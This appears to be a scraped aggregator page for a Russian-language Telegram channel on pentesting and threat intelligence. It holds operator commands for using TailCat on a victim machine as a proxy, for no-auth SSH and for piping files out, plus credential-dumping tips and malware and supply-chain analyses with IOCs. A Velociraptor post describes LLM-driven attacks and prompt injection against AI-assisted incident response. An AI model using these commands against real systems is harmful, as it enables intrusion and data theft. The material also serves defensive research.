ch
Feedback
s0ld13r ch.

s0ld13r ch.

前往频道在 Telegram

Blog about Pentest, TI/TH, OPSEC & other security stuff Questions: @s0ld133r Blog: https://s0ld13r.kz TIP: https://threatintel.kz LoLAI: https://lolai-project.github.io/ For educational purposes only 🧠

显示更多
2 582
订阅者
+824 小时
+447 天
+8530 天

数据加载中...

吸引订阅者
九月 '26
九月 '26
+42
在3个频道中
八月 '26
+77
在2个频道中
Get PRO
七月 '26
+100
在3个频道中
Get PRO
六月 '26
+64
在1个频道中
Get PRO
五月 '26
+65
在1个频道中
Get PRO
四月 '26
+167
在4个频道中
Get PRO
三月 '26
+167
在6个频道中
Get PRO
二月 '26
+220
在3个频道中
Get PRO
一月 '26
+156
在7个频道中
Get PRO
十二月 '25
+80
在2个频道中
Get PRO
十一月 '25
+105
在5个频道中
Get PRO
十月 '25
+148
在4个频道中
Get PRO
九月 '25
+222
在5个频道中
Get PRO
八月 '25
+131
在2个频道中
Get PRO
七月 '25
+116
在3个频道中
Get PRO
六月 '25
+81
在2个频道中
Get PRO
五月 '25
+149
在4个频道中
Get PRO
四月 '25
+774
在7个频道中
Get PRO
三月 '250
在9个频道中
Get PRO
二月 '25
+48
在7个频道中
日期
订阅者增长
提及
频道
05 九月+1
04 九月+10
03 九月+10
02 九月+4
01 九月+17
频道帖子

2
TailCat Red Team use case 😎 Несколько дней назад ребята из TailScale выпустили свой инструмент tailcat, как можно понять из
TailCat Red Team use case 😎 Несколько дней назад ребята из TailScale выпустили свой инструмент tailcat, как можно понять из названия, это аналог netcat но работающий из коробки через сеть TailScale 🤩 Первой моей мыслью стало что инструментом начнут активно пользоваться атакующие и решил расписать разные примеры применения нового "условно легитимного" софта 😃 🔢 SOCKS5 Reverse Proxy Можно использовать машину жертвы как exit-node и через неё получать доступ к внутренней сети. На машине жертвы запускаем следующую команду: tailcat --serve=exit-node По умолчанию tailcat socks поднимает SOCKS5 на случайном порту и передаёт адрес и порт через переменную окружения. Чтобы не возиться с этим каждый раз, я написал небольшой wrapper под названием tcsocks, который поднимает локальный SOCKS5 на 1080 (порт можно поменять). На машине оператора запускаем: tcsocks -q <token> А дальше как обычно пользуемся proxychains: proxychains -f proxy.conf -q nxc rdp 192.168.0.0/24 🔢 SSH доступ без авторизации Tailcat также позволяет в user mode слушать SSH от пользователя, без необходимости вводить пароль, это особенно удобно если был нестабильный шелл и нужно было использовать альтернативный канал. Сперва слушаем No Auth SSH на машине жертвы: tailcat --serve=no-auth-ssh Далее подключаемся по токену с машины оператора: tailcat ssh <token> 🔢 Эксфильтрация данных через pipe Ну и классика - эксфильтрация файлов через pipe на машине жертвы запускаем: cat secret.txt | tailcat <token> На машине оператора запускаем: tailcat > secret.txt Из плюсов вижу то, что инструмент условно легитимный и работает из коробки, с открытым исходным кодом который можно кастомизировать под свои нужды 😎 💻 tcsocks: https://gist.github.com/s0ld13rr/18e2765da1831af0a656e7bb0a819e73 💻 tailcat: https://github.com/tailscale/tailcat 🧢 s0ld13r
1 505
3
Всем привет! Решил создать личный канал в Telegram! Добро пожаловать! Идейный вдохновитель и человек, который чаще всех спрашивал, когда я уже его создам — Аскар @rockyou. Аскар, держи! 😉
1 444
4
Канал моего хорошего друга, рекомендую подписаться 😃
1 436
5
В свете последних новостей про eGov, актуалочка 🤣😃 🧢 s0ld13r
В свете последних новостей про eGov, актуалочка 🤣😃 🧢 s0ld13r
2 955
6
Дампим SAM/SYSTEM через 7-Zip Знакомая ситуация: вы на машине юзера, нужно достать хеши, но reg save или copy блокируются EDR
Дампим SAM/SYSTEM через 7-Zip Знакомая ситуация: вы на машине юзера, нужно достать хеши, но  reg save  или  copy  блокируются EDR, файлы заблокированы самой Windows, а антивирус палит известные утилиты. Но на рабочих станциях часто установлен 7-Zip! И у него есть крутая недокументированная фича - прямое чтение диска (raw disk access). А можно использовать и для DFIR извлекать MFT и т.д. Чем проще и банальнее тем лучше : )
1 783
7
PentestCode v0.2.4 is out 🤩 Выкатил новую версию PentestCode с несколькими улучшениями, в основном правил мультиагентную арх+1
PentestCode v0.2.4 is out 🤩 Выкатил новую версию PentestCode с несколькими улучшениями, в основном правил мультиагентную архитектуру и жесткость границ между их работой 😺 😱 Что изменилось: • Добавил полноценный Artifact Store. Теперь PoC, сгенерированные одним саб-агентом, регистрируются в state и переиспользуются другими вместо повторной генерации • Полностью переделал работу с engagement state. Саб-агенты получают только релевантный контекст, что заметно сократило расход токенов • Координатор теперь реально координирует, а не пытается сам делать всю работу. Добавил рейлы, watchdog’и, лимиты и защиту от бесконечных циклов • Усилил самокритику. Недостаточно сказать «есть root» - любой успешный результат должен подтверждаться артефактом, иначе это только suspected • Подточил reconnaissance skills и порядок их загрузки 👩‍💻 Обновление: pentestcode upgrade P.S Еще есть куда расти дальше поэтому обратная связь, баги, кейсы успешных/провальных прогонов приветствуются 😉 🧢 s0ld13r
1 995
8
Supply-chain атака: EtherHiding C2 во вредоносном форке PentestCode 🕺 Пока просматривал форки своего проекта PentestCode, на+6
Supply-chain атака: EtherHiding C2 во вредоносном форке PentestCode 🕺 Пока просматривал форки своего проекта PentestCode, наткнулся на довольно странные коммиты в одном из них. ⚠️ Сразу отмечу: оригинальный репозиторий PentestCode не был скомпрометирован. Вредоносный код находился исключительно в стороннем форке Решил разобраться, что именно туда добавили. В итоге обычная проверка форка превратилась в полноценный malware research с обширной кампанией. После нескольких этапов деобфускации выяснилось, что это не простой downloader и не очередной стилер, а многоступенчатый JavaScript-бэкдор с удалённым исполнением кода (RCE), использующий технику EtherHiding 😃 🔍 Что удалось установить: • 4 уровня обфускации и самораспаковки; • получение C2 через блокчейн Ethereum без единого захардкоженного IP; • поиск C2 по транзакциям атакующего через публичные Ethereum RPC; • декодирование IP:Port прямо из поля to; • загрузка stage-2 → stage-3; • несколько способов исполнения payload (spawn, eval и резервный запуск); • скрытый запуск процессов (windowsHide, stdio: ignore); • переход из WSL2 на Windows-хост через node.exe Самое интересное - C2 вообще не зашит в код. Вместо этого используется Ethereum как dead-drop: новая транзакция публикует новый адрес C2, и заражённые машины автоматически начинают обращаться уже к нему. Такой подход серьёзно усложняет блокировку инфраструктур 🦍 Но дальше стало ещё интереснее - вредоносный форк принадлежит GitHub-аккаунту KumaloWilson. На аккаунте почти 200 публичных репозиториев, большинство последних - форки инструментов для специалистов по ИБ и AI-разработчиков 🙀 Среди них: • PentestCode • KaliGPT • Kittysploit • Meterless • Nebula • cybersentinel-ai • AhMyth+ • и другие. Сложилось впечатление, что злоумышленники целенаправленно троянизируют проекты, которые с высокой вероятностью будут запускать пентестеры, ресерчеры и разработчики - именно там обычно находятся SSH-ключи, GitHub Token, .env, облачные креды и криптокошельки 😎 При этом нет доказательств, что владелец аккаунта KumaloWilson является автором кампании. Не исключено, что сам аккаунт был скомпрометирован и использовался для распространения вредоносных форков 💻 Полный список IoC в комментариях, проверяйте не только то, что запускаете, но и откуда вы это клонируете 😉 🧢 s0ld13r
1 839
9
🚨 WP2Shell - критический RCE в WordPress Core Исследователи опубликовали детали уязвимости WP2Shell, которая позволяет неаут
🚨 WP2Shell - критический RCE в WordPress Core Исследователи опубликовали детали уязвимости WP2Shell, которая позволяет неаутентифицированному атакующему добиться Remote Code Execution (RCE) на уязвимых версиях WordPress 👩‍💻 📌 Затронутые версии: • WordPress ниже 6.8.5 - не уязвимы • WordPress 6.9.0 – 6.9.4 - уязвимы • WordPress 7.0.0 – 7.0.1 - уязвимы 👀 Что делать? • Необходимо как можно скорее обновить версию CMS WordPress до версии 7.0.2 (или 6.9.5 если вы на ветке 6.9) • Если обновиться не получиться, то можно временно заблокировать доступ к /wp-json/batch/v1 и ?rest_route=/batch/v1 на уровне WAF ⚠️ Учитывайте что могут появиться проблемы в работе сервиса и вариант с обновлением предпочтительнее 🔗 Post: https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/ 🧢 s0ld13r
1 650
10
🛠 Всем привет. Я тут допилил CLI-движок для LOLCreds на Go. Называется это безобразие CredsHound. Если коротко, это такая ут
🛠 Всем привет. Я тут допилил CLI-движок для LOLCreds на Go. Называется это безобразие CredsHound. Если коротко, это такая утилита для поиска учетных данных, ключей на хосте, которая работает по концепции Nuclei. Из коробки она ищет: - Пароли и API-ключи, забытые в истории терминалов (.bash_history, .zsh_history, ConsoleHost_history.txt). - Приватные ключи SSH, конфигурации Kubernetes и токены Docker Registry. - Артефакты Windows: пароли из файлов автоматической установки (Unattended XML), конфиги RDCMan и групповые политики с зашифрованными cpassword. - Локальные файлы конфигурации БД вроде .pgpass или .my.cnf. 🐶 Ну и интеграция с собакой тоже есть. Потому что просто выплевывать цветной текст в консоль скучно. 📖 Как запустить: # установка go install github.com/haxxm0nkey/credshound/cmd/credshound@latest # запуск credshound -ut credshound . 🔗 Где исходники, Билли? Движок: https://github.com/haxxm0nkey/credshound Хорошей пятницы вам, держитесь там!
1 092
11
LegacyHive: Just another Windows LPE from NightmareEclipse The PoC requires another standard user credentials and a third use
LegacyHive: Just another Windows LPE from NightmareEclipse The PoC requires another standard user credentials and a third username (which can be an administrator account), if the PoC is successful, it will end up mounting the target user hive in current user classes root. 💻 LegacyHive: https://git.projectnightcrawler.dev/NightmareEclipse/LegacyHive 🧢 s0ld13r
1 420
12
🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️ 🅰️🔢❎🔢❎🔢 Выкатил ряд фиксов на PentestCode в релизе 0.2.1 (альфа). В этот раз основной ф
🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️ 🅰️🔢❎🔢❎🔢 Выкатил ряд фиксов на PentestCode в релизе 0.2.1 (альфа). В этот раз основной фокус был не на новых фичах, а на том, чтобы сделать агента более стабильным и приблизить его поведение к работе реального пентестера (ну или не очень) 😎 • Улучшена оркестрация и управление субагентами • Добавлена обязательная just-in-time загрузка скиллов • Доработан TUI: теперь проще отслеживать активных субагентов • Исправлен механизм обновлений - теперь достаточно выполнить pentestcode upgrade, чтобы обновить и самого агента, и встроенные скиллы (применимо только с v0.2.1 и последующих релизах) Ну и, конечно, некоторые фиксы и полировки по мелочи. Я подготовил короткое демо как это примерно выглядит на данном этапе 😺 В последующих релизах постараюсь исправить и другие недочеты, чтобы пользоваться им было еще приятнее, stay tuned 😎 P.S А я напомнию что у меня есть аккаунт в X - буду рад видеть вас там в качестве подписчиков 😉 https://x.com/s0ld133rr?s=11 🧢 s0ld13r
1 698
13
И таааааак сойдет😅 Давно ничего не постил. За это время успел увидеть как все резко стали экспертами по мультиагентным систе
И таааааак сойдет😅 Давно ничего не постил. За это время успел увидеть как все резко стали экспертами по мультиагентным системам, MCP, A2A и еще двадцати новым аббревиатурам которые появляются быстрее чем новые модели у OpenAI ⭕️ Но как бы то ни было, жизнь ироничная штука. В какой-то момент я тоже решил посмотреть, что вообще происходит в мире AI для Offensive Security. Перетестил разные инструменты, поковырял open-source проекты и понял, что почти везде мне чего-то не хватает: где-то архитектуры, где-то удобного workflow, где-то агент просто забывает, что было пять сообщений назад 🥱 Так появился PentestCode - форк OpenCode, заточенный под пентест. Вместо того чтобы тратить недели на TUI, авторизацию и поддержку десятков LLM-провайдеров, я решил сосредоточиться на архитектуре и воркфлоу агента 😎 Пока успел реализовать engagements со своим состоянием, общий контекст для всех субагентов, Task Graph для планирования, автоматический импорт результатов популярных инструментов, построение Attack Path и память между агентами. Сейчас проекту очень нужно много тестов, предложений и замечаний поэтому я буду очень признателен за обратную связь в лс или в issues на github 👋 👩‍💻 Установка: curl -fsSL https://raw.githubusercontent.com/s0ld13rr/pentestcode/main/install.sh | bash 👀Использование: pentestcode auth login pentestcode # launch TUI pentestcode -s <session-id> 💻 PentestCode: https://github.com/s0ld13rr/pentestcode Буду рад если поставите звезду на гитхабе и поделитесь с друзьями/коллегами 😉 P.S Проект еще очень молодой поэтому могут быть недочеты за фиксом можно в лс 🧢 s0ld13r
3 644
14
Обнаружены подозрительные домены в зоне home[.]kg 🇰🇬 Домены - auth.home[.]kg 🇰🇬 - vscode.auth.home[.]kg 🇰🇬 Оба домена присутствуют в Maltrail (apt_kimsuky.txt) и связаны с инфраструктурой, которую OSINT-источники относят к Kimsuky / APT43 / Emerald Sleet. Текущие резолвы auth.home[.]kg 🇰🇬 • IP-адрес: 80.68.237.36 • Локация / Провайдер: Польша 🇵🇱 vscode.auth.home[.]kg 🇰🇬 • IP-адрес: 153.75.247.209 • Локация / Провайдер: США 🇺🇸, Interserver (VPS) Цель атаки Это атака на разработчиков. Домен vscode.auth.home[.]kg создан для имитации легитимного OAuth redirect URI Visual Studio Code. Такие домены используются для кражи токенов аутентификации у разработчиков, DevOps-инженеров и исследователей. Важное замечание home[.]kg 🇰🇬 — это публичная FreeDNS-зона на afraid.org. Любой может создавать поддомены. Наличие .kg не означает, что целью является Кыргызстан. О группе Kimsuky Kimsuky (APT43 / Emerald Sleet) — северокорейская кибершпионская группа, активная с 2012 года. Для неё характерны социальная инженерия, поддельные страницы входа и кража учётных данных у технических специалистов.
1 217
15
Сделал скромный вклад в IPAHound 🐕 Столкнулся с тем, что оригинальный pyproject.toml конфликтовал с новыми версиями Python �+2
Сделал скромный вклад в IPAHound 🐕 Столкнулся с тем, что оригинальный pyproject.toml конфликтовал с новыми версиями Python 👩‍💻, из-за чего установка могла ломаться. Подготовил фикс и отправил Merge Request (уже принят), теперь установка должна проходить заметно проще 💃 👩‍💻 Установка: curl -LsSf https://astral.sh/uv/install.sh | sh uv tool install git+https://github.com/IPAHound/IPAHound 😎 Использование: ipahound -s dc.soldier.local -u user.name -p 'p@ssw0rd' -o dump.json 💻 MR: https://github.com/IPAHound/IPAHound/pull/3 🧢 s0ld13r
2 500
16
Same Tool, Two Hats: AI Velociraptor for Attack and Defense Всё чаще появляются отчёты об LLM-operated атаках: человек задаёт
Same Tool, Two Hats: AI Velociraptor for Attack and Defense Всё чаще появляются отчёты об LLM-operated атаках: человек задаёт цель, а LLM помогает вести операцию - выбирает следующий шаг, интерпретирует вывод инструментов и принимает тактические решения. Этот POC - попытка показать, как такая модель выглядит на практике с реальным DFIR-инструментом. За основу взят mgreen27/mcp-velociraptor - MCP-обёртка над Velociraptor API: https://github.com/mgreen27/mcp-velociraptor Изначальная идея проекта - дать DFIR-аналитику возможность работать с Velociraptor через Claude. Я посмотрел на ту же связку с другой стороны: если LLM может помогать защитнику исследовать endpoint, те же вещи могут работать и в adversary emulation. На эту мысль также натолкнул пост: https://t.me/s0ld13r_ch/82 Velociraptor здесь интересен как dual-use инструмент: легитимный агент, подписанный бинарь, TLS-трафик, централизованный сервер и мощный язык артефактов. В defensive-сценарии это ускоряет IR. В offensive-модели тот же подход может превратиться в управляемый канал для reconnaissance, command execution и controlled file collection. Я добавил кастомных оберток поверх оригинального MCP проекта: - run_shell, run_powershell, run_vql_raw - выполнение команд и client-side VQL через Velociraptor. - collect_arbitrary_file, recursive_collect - точечный сбор файлов и scoped recursive collection из заданных директорий. - download_file, upload_file - работа с собранными файлами и controlled transfer с SHA256-verification. Разница принципиальная: оригинальный bridge помогает LLM видеть endpoint через DFIR-артефакты. Добавленные обертки позволяют LLM инициировать действия через Velociraptor API. В моей лабе Defensive сторона та же: IR-аналитик подключает свой Velociraptor-сервер, деплоит агент на исследуемую машину и через Claude Desktop/Claude Code проводит triage. Процессы, сетевые соединения, сервисы, scheduled tasks, Sysmon Event ID 1/3, Event ID 7045, Amcache, Shimcache и файловые артефакты читаются через один MCP-интерфейс. Главный challenge - Prompt Injection в AI-assisted IR. Если атакующий оставляет payload в логах, файлах, command line или staged notes, DFIR-агент может прочитать attacker-controlled content через LLM. В этот момент артефакт просто руинит исследование для IR команды... То есть в AI-assisted IR нужно понимать как работает аналитический контур: как LLM читает артефакты, где отделяются данные от инструкций, какие действия требуют подтверждений и как логируются вызовы инструментов. Мои Custom MCP тулы: https://github.com/rarh1k/mcp-ai-velo-dfir References: Solar 4RAYS - https://rt-solar.ru/solar-4rays/blog/4559/ Sophos - https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/ Rapid7 - https://www.rapid7.com/blog/post/pt-identifying-and-mitigating-potential-velociraptor-abuse/ Cisco Talos - https://blog.talosintelligence.com/velociraptor-leveraged-in-ransomware-attacks/ 🦔 THF #Velociraptor #DFIR #ThreatHunting #IncidentResponse #MCP #ClaudeCode #LLM #AIForCybersecurity #AIIR #PromptInjection #RedTeam #AdversaryEmulation #DualUse #CyberSecurity #DetectionEngineering #DigitalForensics #SOC #APT #IR #THF
732
17
ТЗ от Заказчика на услуги по ИБ 🤣 🧢 s0ld13r
ТЗ от Заказчика на услуги по ИБ 🤣 🧢 s0ld13r
1 692
18
🎖 Наша команда FR13NDS TEAM заняла 1 место на CTF KBTU 2026! 🚩 🏫 10 мая 2026 года в Kazakh-British Technical University (K+5
🎖 Наша команда FR13NDS TEAM заняла 1 место на CTF KBTU 2026! 🚩 🏫 10 мая 2026 года в Kazakh-British Technical University (KBTU) в Алматы прошло соревнование CTF KBTU 2026. Организаторами соревнования выступила команда ctf_enjoyers. 💻 В соревновании приняли участие 16 команд. Участникам были предложены задания в категориях Web, Crypto, Reverse, OSINT и Misc, а также использование ИИ-инструментов, LLM/AI-ассистентов для решения заданий было запрещено. 🏆 Итоговый зачёт: 🥇 1 место — FR13NDS TEAM (6359 очков) — 300 000 тг 🥈 2 место — mimicats (4593 очка) — 200 000 тг 🥉 3 место — c1cada (3821 очко) — 100 000 тг 👏 Поздравляем всех участников, организаторов и всех, кто был причастен к проведению этого соревнования и сделал его возможным! 🌐 Telegram 🌐Instagram 🌐LinkedIn
1 428
19
Коротко о проблемах вайб-кодинга и безопасности 🤣 🧢 s0ld13r
Коротко о проблемах вайб-кодинга и безопасности 🤣 🧢 s0ld13r
1 827
20
BitWarden CLI скомпрометирован: новая волна Shai-Hulud 🚨 В npm пакете @bitwarden/cli (версия 2026.4.0) обнаружен троянизиров
BitWarden CLI скомпрометирован: новая волна Shai-Hulud 🚨 В npm пакете @bitwarden/cli (версия 2026.4.0) обнаружен троянизированный билд, замаскированный под легитный CLI. Пакет сохраняет оригинальные метаданные, но execution path переписан - при установке запускается вредоносный loader подгружающий стилер Shai-Hulud 👀 Payload разворачивается в несколько этапов: через preinstall запускается bw_setup.js, который подтягивает Bun runtime с GitHub и исполняет обфусцированный скрипт 😃 Основной функционал: • кража dev-секретов: .npmrc, .git-credentials, .env, SSH ключи • сбор cloud-доступов: AWS / GCP / Azure • извлечение gh auth token и дальнейшая работа через GitHub API • fallback через commit search (LongLiveTheResistanceAgainstMachines / beautifulcastle) • создание репозиториев у жертвы и загрузка туда зашифрованных данных • попытки получения секретов из GitHub Actions Отдельно стоит отметить таргетинг .claude и MCP конфигов, у атакующего явный интерес к AI инструментам. Если пакет c версией 2026.4.0 устанавливался нужно считать хост скомпрометированным и ротировать все секреты 🏃‍♂️ 🛡 IOC for hunts: Сетевые индикаторы audit[.]checkmarx[.]cx 94[.]154[.]172[.]43 https://audit[.]checkmarx[.]cx/v1/telemetry Файлы / пакет @bitwarden/cli 2026.4.0 bw_setup.js bw1.js SHA суммы 18f784b3bc9a0bcdcb1a8d7f51bc5f54323fc40cbd874119354ab609bef6e4cb 8605e365edf11160aad517c7d79a3b26b62290e5072ef97b102a01ddbb343f14 167ce57ef59a32a6a0ef4137785828077879092d7f83ddbc1755d6e69116e0ad 🔗 Report: https://www.ox.security/blog/shai-hulud-bitwarden-cli-supply-chain-attack/ 🔗 JFrog Research: https://research.jfrog.com/post/bitwarden-cli-hijack/ 🔗 OpenSourceMalware: https://opensourcemalware.com/npm/@bitwarden/cli 🧢 s0ld13r
2 108